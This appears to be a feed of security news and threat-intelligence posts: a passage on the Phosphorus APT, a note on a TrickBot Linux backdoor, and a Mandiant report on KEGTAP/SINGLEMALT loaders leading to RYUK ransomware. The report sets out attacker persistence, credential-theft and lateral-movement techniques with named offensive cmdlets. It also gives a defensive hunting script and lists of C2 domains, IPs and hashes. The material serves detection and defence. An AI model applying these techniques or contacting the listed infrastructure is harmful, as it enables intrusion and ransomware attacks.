The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. In past campaigns, the APT group launched spear-phishing attacks against activists and journalists focusing on the Middle East, US organizations, and entities located in Israel, the U.K., Saudi Arabia, and Iraq.

Recently Microsoft published a post and a series of tweets to warn of cyber attacks exploiting the Zerologon vulnerability carried out by the Iran-linked APT group known as MuddyWater, aka Mercury.

The IT giant also warned of cyber espionage campaigns carried out by other nation-state-sponsored hacking groups operating from Russia and China, targeting organizations and individuals involved in this year’s U.S. presidential election.

Pierluigi Paganini

(SecurityAffairs – hacking, Phosphorous)

The post Iran-linked Phosphorous APT hacked emails of security conference attendees appeared first on Security Affairs.

TrickBot operators employ Linux variants in attacks after recent takedown

A few days after the TrickBot takedown, Netscout researchers spotted a new TrickBot Linux variant that was used by its operators.

A few days ago, Microsoft’s Defender team, FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT, and Broadcom’s cyber-security division Symantec joined forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Microsoft has taken down 120 of the 128 servers that composed the TrickBot infrastructure.

Microsoft announced that it had taken down 62 of the original 69 TrickBot C&C servers; the seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Microsoft also revealed that the operators tried to resume operations; the company brought down 58 of the 59 servers the operators attempted to bring online after the recent takedown.

According to a new report published by researchers from security firm Netscout, TrickBot’s operators have started to use a new variant of their malware in an attempt to target Linux systems and expand the list of their targets.

TrickBot is a popular banking Trojan that has been around since October 2016; its authors have continuously upgraded it by implementing new features.

At the end of 2019, researchers spotted a new TrickBot backdoor framework dubbed Anchor that was using the DNS protocol for C2 communications.

Stage 2 Security researcher Waylon Grange first spotted the new Linux variant of Anchor_DNS in July and called it “Anchor_Linux.”

“The actors behind Trickbot, a high profile banking trojan, have recently developed a Linux port of their new DNS command and control tool known as Anchor_DNS.” explained Grange.

“Often delivered as part of a zip, this malware is a lightweight Linux backdoor. Upon execution it installs itself as a cron job, determines the public IP [address] for the host and then begins to beacon via DNS queries to its C2 server.”

Researchers from Netscout now published an analysis of the variant detailing the communication flow between the bot and the C2 server.

The client sends “c2_command 0” to the server along with information about the compromised system and the bot ID; the server, in turn, responds with the message “signal /1/” back to the bot.

Trickbot Linux

The infected host responds by sending the same message back to the C2, which in turn sends the command to be executed by the bot. Once the command has executed, the bot sends the result of the execution to the C2 server.

“The complexity of Anchor’s C2 communication and the payloads that the bot can execute reflect not only a portion of the Trickbot actors’ considerable capabilities, but also their ability to constantly innovate, as evidenced by their move to Linux.” concludes the report. “It is important to note that Trickbot operators aren’t the only adversaries to realize the value of targeting other operation systems”

Pierluigi Paganini

(SecurityAffairs – hacking, Trickbot)

The post TrickBot operators employ Linux variants in attacks after recent takedown appeared first on Security Affairs.

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfig, findstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt.
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc.) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS jobs on a host, run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • Named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.
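The host-based checks described in this section (Winlogon Userinit and Startup-folder LNKs for KEGTAP, BITS jobs for SINGLEMALT, Run keys for WINEKEY, scheduled tasks and SysWOW64 binaries for ANCHOR, and Event ID 7045 service installs for BEACON) gathered into one PowerShell triage script. This is an added example, not Mandiant's or the malware's code; the BitsJob property names (NotifyCmdLine, NotifyFlags, RetryInterval, FileList), the default Userinit value and the GUID-style name under which unnamed scheduled tasks appear are assumptions.

```powershell
#Requires -RunAsAdministrator
# Added hunting script (not Mandiant's code). Collects the persistence artifacts described
# above for KEGTAP, SINGLEMALT, WINEKEY, ANCHOR and BEACON on one host and returns them as
# objects for triage. Assumptions: BitsJob property names (NotifyCmdLine, NotifyFlags,
# RetryInterval, FileList) from the BitsTransfer module; the standard Userinit default;
# and that unnamed scheduled tasks surface under a GUID-style name.
Import-Module BitsTransfer

function Find-KegtapPersistenceArtifacts {
    [CmdletBinding()]
    param(
        # Window for service-install events (Event ID 7045).
        [int]$LookbackDays = 30
    )
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Family, [string]$Source, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Family = $Family; Source = $Source; Detail = $Detail })
    }

    # 1. KEGTAP: Userinit under Winlogon. Default is "C:\Windows\system32\userinit.exe,"
    #    (assumed standard path); any additional comma-separated entry is suspect.
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $userinit = (Get-ItemProperty -Path $winlogon -Name Userinit -ErrorAction SilentlyContinue).Userinit
    foreach ($entry in ($userinit -split ',')) {
        $e = $entry.Trim()
        if ($e -and $e -notmatch '^[a-z]:\\windows\\system32\\userinit\.exe$') {
            Add-Finding 'KEGTAP' 'Winlogon\Userinit' $e
        }
    }

    # 1b. KEGTAP: shortcuts in every user's Startup folder and in the all-users Startup folder.
    $shell = New-Object -ComObject WScript.Shell
    $lnkPaths = @("$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk",
                  "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk")
    foreach ($lnk in (Get-ChildItem -Path $lnkPaths -File -ErrorAction SilentlyContinue)) {
        $target = $shell.CreateShortcut($lnk.FullName).TargetPath
        Add-Finding 'KEGTAP' 'Startup folder LNK' ("{0} -> {1}" -f $lnk.FullName, $target)
    }

    # 2. SINGLEMALT: BITS jobs carrying a notification command line (the failure-triggered
    #    persistence described above). NotifyFlags 2 = notify on job error.
    foreach ($job in (Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue)) {
        if ($job.NotifyCmdLine) {
            $urls = ($job.FileList | ForEach-Object { $_.RemoteName }) -join ','
            $cmd = $job.NotifyCmdLine -join ' '
            Add-Finding 'SINGLEMALT' 'BITS job' ("'{0}' state={1} notify={2} retry={3}s cmd={4} url={5}" -f $job.DisplayName, $job.JobState, $job.NotifyFlags, $job.RetryInterval, $cmd, $urls)
        }
    }

    # 3. WINEKEY: Run values in HKLM and in every loaded user hive. "Backup Mgr" is the name
    #    reported above; other values pointing into user-writable paths are also worth a look.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') +
        (Get-ChildItem -Path HKU:\ -ErrorAction SilentlyContinue |
            ForEach-Object { "HKU:\$($_.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Run" })
    foreach ($path in $runKeys) {
        $key = Get-Item -Path $path -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $value = [string]$key.GetValue($name)
            if ($name -eq 'Backup Mgr' -or $value -match '\\(AppData|ProgramData|Temp|Users\\Public)\\') {
                Add-Finding 'WINEKEY' 'Run key' ("{0}\{1} = {2}" -f $path, $name, $value)
            }
        }
    }

    # 4. ANCHOR: tasks named autoupdate#<n> and unnamed tasks (assumed to appear under a
    #    GUID-style name). The registration date helps correlate with the suspected compromise.
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        if ($task.TaskName -match 'autoupdate#\d+' -or $task.TaskName -match '^\{?[0-9A-F-]{36}\}?$') {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            Add-Finding 'ANCHOR' 'Scheduled task' ("{0}{1} registered={2} action={3}" -f $task.TaskPath, $task.TaskName, $task.Date, $actions)
        }
    }

    # 5. ANCHOR (low fidelity): <8 lowercase chars>.exe in SysWOW64, newest first. Expect a
    #    cluster of OS-install timestamps (certutil.exe, schtasks.exe, ...); a lone recent file stands out.
    Get-ChildItem -Path "$env:SystemRoot\SysWOW64" -Filter *.exe -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -cmatch '^[a-z]{8}\.exe$' } |
        Sort-Object CreationTime -Descending |
        ForEach-Object { Add-Finding 'ANCHOR' 'SysWOW64 binary' ("{0} created={1}" -f $_.FullName, $_.CreationTime) }

    # 6. BEACON: service installs recorded as Event ID 7045 in the System log.
    #    EventData order: ServiceName, ImagePath, ServiceType, StartType, AccountName.
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$LookbackDays) }
    foreach ($ev in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $p = $ev.Properties
        Add-Finding 'BEACON' 'Event 7045' ("{0} service='{1}' image={2} account={3}" -f $ev.TimeCreated, $p[0].Value, $p[1].Value, $p[4].Value)
    }
    return $findings
}

# Run on the host under review; pipe to Export-Csv instead to collect results at scale.
Find-KegtapPersistenceArtifacts | Format-Table -AutoSize -Wrap
```

Every row is a lead, not a verdict: the SysWOW64 and Run-key checks in particular will list legitimate entries, so review them against a known-good host or a baseline image.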

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAs for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability of privileged accounts such as Domain Administrators and privileged service accounts to initiate RDP connections and network logins. Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Oftentimes there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that does not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s


Code Signing Certificate CNs


UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s


10/1/20

rapirasa[.]com

10/1/20

raidbossa[.]com

10/1/20

mountasd[.]com

10/1/20

puckhunterrr[.]com

10/1/20

pudgeee[.]com

10/1/20

loockfinderrs[.]com

10/1/20

lindasak[.]com

10/1/20

bithunterr[.]com

10/1/20

voiddas[.]com

10/1/20

sibalsakie[.]com

10/1/20

giveasees[.]com

10/1/20

shabihere[.]com

10/1/20

tarhungangster[.]com

10/1/20

imagodd[.]com

10/1/20

raaidboss[.]com

10/1/20

sunofgodd[.]com

10/1/20

rulemonster[.]com

10/1/20

loxliver[.]com

10/1/20

servicegungster[.]com

10/1/20

kungfupandasa[.]com

10/2/20

check1domains[.]com

10/5/20

sweetmonsterr[.]com

10/5/20

qascker[.]com

10/7/20

remotessa[.]com

10/7/20

cheapshhot[.]com

10/7/20

havemosts[.]com

10/7/20

unlockwsa[.]com

10/7/20

sobcase[.]com

10/7/20

zhameharden[.]com

10/7/20

mixunderax[.]com

10/7/20

bugsbunnyy[.]com

10/7/20

fastbloodhunter[.]com

10/7/20

serviceboosterr[.]com

10/7/20

servicewikii[.]com

10/7/20

secondlivve[.]com

10/7/20

quwasd[.]com

10/7/20

luckyhunterrs[.]com

10/7/20

wodemayaa[.]com

10/7/20

hybriqdjs[.]com

10/7/20

gunsdrag[.]com

10/7/20

gungameon[.]com

10/7/20

servicemount[.]com

10/7/20

servicesupdater[.]com

10/7/20

service-boosterr[.]com

10/7/20

serviceupdatter[.]com

10/7/20

dotmaingame[.]com

10/12/20

backup1service[.]com

10/13/20

bakcup-monster[.]com

10/13/20

bakcup-checker[.]com

10/13/20

backup-simple[.]com

10/13/20

backup-leader[.]com

10/13/20

backup-helper[.]com

10/13/20

service-checker[.]com

10/13/20

nasmastrservice[.]com

10/14/20

service-leader[.]com

10/14/20

nas-simple-helper[.]com

10/14/20

nas-leader[.]com

10/14/20

boost-servicess[.]com

10/14/20

elephantdrrive[.]com

10/15/20

service-hellper[.]com

10/16/20

top-backuphelper[.]com

10/16/20

best-nas[.]com

10/16/20

top-backupservice[.]com

10/16/20

bestservicehelper[.]com

10/16/20

backupnas1[.]com

10/16/20

backupmastter[.]com

10/16/20

best-backup[.]com

10/17/20

viewdrivers[.]com

10/19/20

topservicebooster[.]com

10/19/20

topservice-masters[.]com

10/19/20

topbackupintheworld[.]com

10/19/20

topbackup-helper[.]com

10/19/20

simple-backupbooster[.]com

10/19/20

top3-services[.]com

10/19/20

backup1services[.]com

10/21/20

backupmaster-service[.]com

10/21/20

backupmasterservice[.]com

10/21/20

service1updater[.]com

10/21/20

driverdwl[.]com

10/21/20

backup1master[.]com

10/21/20

boost-yourservice[.]com

10/21/20

checktodrivers[.]com

10/21/20

backup1helper[.]com

10/21/20

driver1updater[.]com

10/21/20

driver1master[.]com

10/23/20

view-backup[.]com

10/23/20

top3servicebooster[.]com

10/23/20

servicereader[.]com

10/23/20

servicehel[.]com

10/23/20

driver-boosters[.]com

10/23/20

service1update[.]com

10/23/20

service-hel[.]com

10/23/20

driver1downloads[.]com

10/23/20

service1view[.]com

10/23/20

backups1helper[.]com

10/25/20

idriveview[.]com

10/26/20

debug-service[.]com

10/26/20

idrivedwn[.]com

10/28/20

driverjumper[.]com

10/28/20

service1boost[.]com

10/28/20

idriveupdate[.]com

10/28/20

idrivehepler[.]com

10/28/20

idrivefinder[.]com

10/28/20

idrivecheck[.]com

10/28/20

idrivedownload[.]com

 

First Seen

Server

Subject

MD5

12/12/19

140.82.60.155:443

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

12/21/19

96.30.192.141:443

CN=cmdupdatewin[.]com

3d4de17df25412bb714fda069f6eb27e

1/6/20

45.76.49.78:443

CN=scrservallinst[.]info

cd6035bd51a44b597c1e181576dd44d9

1/8/20

149.248.58.11:443

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/9/20

96.30.193.57:443

CN=winsystemupdate[.]com

e4e732502b9658ea3380847c60b9e0fe

1/14/20

95.179.219.169:443

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

1/16/20

140.82.27.146:443

CN=winsysteminfo[.]com

29e656ba9d5d38a0c17a4f0dd855b37e

1/19/20

45.32.170.9:443

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/20/20

207.148.8.61:443

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/28/20

209.222.108.106:443

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

1/29/20

31.7.59.141:443

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

1/29/20

79.124.60.117:443

C=US

9722acc9740d831317dd8c1f20d8cfbe

1/29/20

66.42.86.61:443

CN=lsassupdate[.]com

3c9b3f1e12473a0fd28dc37071168870

1/29/20

45.76.20.140:443

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/29/20

45.76.20.140:80

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/30/20

149.248.5.240:443

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

144.202.12.197:80

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.248.5.240:80

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

149.28.246.25:80

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

144.202.12.197:443

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.28.246.25:443

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

45.77.119.212:443

CN=taskshedulewin[.]com

e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

45.77.119.212:80

CN=taskshedulewin[.]com

